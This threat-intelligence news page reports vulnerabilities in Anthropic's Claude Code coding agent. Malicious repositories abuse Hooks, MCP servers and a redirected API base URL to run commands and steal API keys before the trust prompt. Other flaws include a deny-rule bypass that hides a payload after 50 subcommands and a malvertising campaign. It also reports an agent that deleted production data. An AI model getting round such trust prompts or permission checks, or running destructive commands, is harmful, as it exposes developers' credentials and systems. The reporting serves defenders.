Skip to main content
Mallory

Critical Vulnerabilities in Anthropic Claude Code Enable RCE and API Key Theft via Malicious Repositories

ai-platform-securityendpoint-software-vulnerabilitywidely-deployed-product-advisorycredential-access-methodinitial-access-method
Updated April 6, 2026 at 12:00 PM8 sources
Share:
Critical Vulnerabilities in Anthropic Claude Code Enable RCE and API Key Theft via Malicious Repositories

Get Ahead of Threats Like This

Know if you're exposed. Before adversaries strike.

Check Point Research disclosed multiple critical vulnerabilities in Anthropic’s Claude Code AI coding assistant that could allow remote code execution and credential theft when a developer clones and opens an untrusted repository. The reported attack path abuses repository-controlled configuration and automation features (including Hooks, MCP servers, and environment variables) to trigger hidden shell command execution and to exfiltrate Anthropic API credentials, potentially enabling a pivot from a developer workstation into broader enterprise environments where Claude-related workflows and shared resources are accessible.

The issues include consent-bypass and command-execution weaknesses tracked under CVE-2025-59536 (covering closely related flaws involving repository configuration executing commands without adequate user consent) and an API credential exposure issue tracked as CVE-2026-21852, which affected Claude Code versions prior to 2.0.65 and enabled API key theft via malicious project configurations. Anthropic has patched the vulnerabilities and advised users to update to the latest version, while indicating additional hardening measures are planned to reduce supply-chain risk from malicious commits and repository-level configuration abuse.

Timeline

  1. Apr 6, 2026

    Anthropic fixes Claude Code deny-rule bypass in v2.1.90

    Anthropic addressed a high-severity Claude Code vulnerability that let attackers bypass developer-configured deny rules by hiding malicious payloads after the 50th subcommand in a long shell command. The flaw stemmed from a legacy regex-based parser in bashPermissions.ts that stopped detailed analysis after 50 entries and fell back to a generic permission prompt, creating a path to credential theft and supply-chain compromise.

  2. Feb 25, 2026

    Check Point publicly discloses three Claude Code vulnerabilities

    On February 25, 2026, Check Point Research publicly disclosed three Claude Code vulnerabilities that could let attackers achieve remote code execution and steal Anthropic API keys by luring developers into opening malicious repositories. The disclosure framed repository configuration files as a new AI software supply-chain attack surface.

  3. Feb 25, 2026

    Anthropic patches Claude Code trust and execution weaknesses

    Before public disclosure, Anthropic fixed the reported issues by tightening trust prompts, preventing Hooks and MCP execution before approval, and blocking network/API activity until a user explicitly trusts a repository. Advisories and CVEs were issued for at least two of the flaws, including CVE-2025-59536 and CVE-2026-21852.

  4. Jan 1, 2025

    Check Point privately reports Claude Code flaws to Anthropic

    Check Point Research identified three vulnerabilities in Anthropic's Claude Code across 2025 and coordinated responsible disclosure with Anthropic. The flaws involved repository-controlled Hooks and MCP settings enabling code execution, plus configuration-based API key exfiltration.

See the full picture in Mallory

Mallory subscribers get deeper analysis on every story, including:

Impact Assessment

Who’s affected and how

Technical Details

Deep-dive technical analysis

Response Recommendations

Actionable next steps for your team

Indicators of Compromise

IPs, domains, hashes, and more

AI Threads

Ask questions and take action on every story

Advanced Filters

Filter by topic, classification, timeframe

Scheduled Alerts

Get matching stories delivered automatically

Sources

February 26, 2026 at 12:00 AM

3 more from sources like register security, security affairs and dark reading

Related Stories

Vulnerabilities in Anthropic Claude Code Enable Code Execution and API Key Exfiltration

Vulnerabilities in Anthropic Claude Code Enable Code Execution and API Key Exfiltration

Security researchers disclosed multiple vulnerabilities in **Anthropic’s Claude Code** AI coding assistant that could enable **arbitrary command execution** and **exfiltration of Anthropic API credentials** when developers clone/open a malicious repository. Check Point Research reported the issues abuse Claude Code configuration and initialization paths—particularly **project hooks** (e.g., untrusted `.claude/settings.json`), **Model Context Protocol (MCP) servers**, and **environment variables**—to trigger shell command execution and data theft. Anthropic’s advisory for **CVE-2026-21852** describes a project-load flow where a crafted repo can set `ANTHROPIC_BASE_URL` to an attacker-controlled endpoint, causing Claude Code to send API requests **before** the trust prompt is shown, potentially leaking the user’s API key. The disclosed issues include two high-severity code-injection paths (CVSS **8.7**) and one information-disclosure flaw (CVSS **5.3**): a consent-bypass/hook-based injection issue fixed in *Claude Code* **1.0.87** (Sept 2025), **CVE-2025-59536** fixed in **1.0.111** (Oct 2025), and **CVE-2026-21852** fixed in **2.0.65** (Jan 2026). Separate coverage framed Anthropic-related developments as market-moving, noting investor attention around Anthropic’s AI code-security tooling; however, the actionable security impact in this reporting is the risk that simply opening an attacker-controlled repository can lead to **RCE** and **credential leakage**, reinforcing the need to treat untrusted repos and tool initialization behaviors as a supply-chain and developer-workstation risk.

3 weeks ago
Command Injection Flaws Expose OpenClaw and Anthropic Claude Code to RCE

Command Injection Flaws Expose OpenClaw and Anthropic Claude Code to RCE

Two high-severity command injection vulnerabilities have been disclosed in developer tooling and automation software, enabling arbitrary command execution through improperly sanitized shell inputs. `CVE-2026-32917` affects OpenClaw versions earlier than `2026.3.13`, where the iMessage attachment staging workflow passes unsanitized remote attachment paths directly into an SCP remote operand. If remote attachment staging is enabled, an unauthenticated attacker can use shell metacharacters in attachment paths to execute commands on configured remote hosts; the flaw is tracked as `CWE-78` and carries a CVSS v3.1 rating of `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`. A separate issue, `CVE-2026-35020`, impacts Anthropic Claude Code CLI and the Claude Agent SDK, where attacker-controlled input from the `TERMINAL` environment variable can reach `/bin/sh` with `shell=true` through the command lookup helper and deep-link terminal launcher. A local attacker can exploit the bug during normal CLI use or via the deep-link handler to run arbitrary commands with the privileges of the invoking user. Both disclosures highlight continued risk from unsanitized shell metacharacters in application workflows, with OpenClaw publishing a fixing commit and security advisory alongside third-party vulnerability reporting.

3 weeks ago
Malicious and unsafe use of Anthropic Claude Code leading to malware delivery and destructive infrastructure changes

Malicious and unsafe use of Anthropic Claude Code leading to malware delivery and destructive infrastructure changes

Push Security reported an **“InstallFix” malvertising campaign** targeting developers searching for Anthropic’s *Claude Code* CLI. Attackers clone the legitimate installation page on lookalike domains and buy **Google Search ads** so the fake pages rank highly for queries like “install Claude Code” and “Claude Code CLI.” While links on the page route to Anthropic’s real site, the **copy‑paste install one‑liners** are replaced with malicious commands that fetch malware from attacker-controlled infrastructure; the Windows flow was observed delivering the **Amatera Stealer**, with macOS users likely targeted by similar info-stealing malware. Separately, a reported operational incident highlighted the risk of delegating privileged infrastructure actions to AI agents without strong guardrails: a developer described using *Claude Code* to run **Terraform** changes during an AWS migration and, after a missing Terraform state file led to duplicate resources, subsequent cleanup actions resulted in the **deletion of production components**, including a database and recovery snapshots—wiping roughly **2.5 years of records**. Together, the reports underscore two distinct but compounding risks around AI coding agents: **supply-chain style social engineering** via fake install instructions and **high-impact misexecution** when AI-driven automation is allowed to operate with destructive permissions in production environments.

Yesterday

Get Ahead of Threats Like This

Mallory continuously monitors global threat intelligence and correlates it with your attack surface. Know if you're exposed. Before adversaries strike.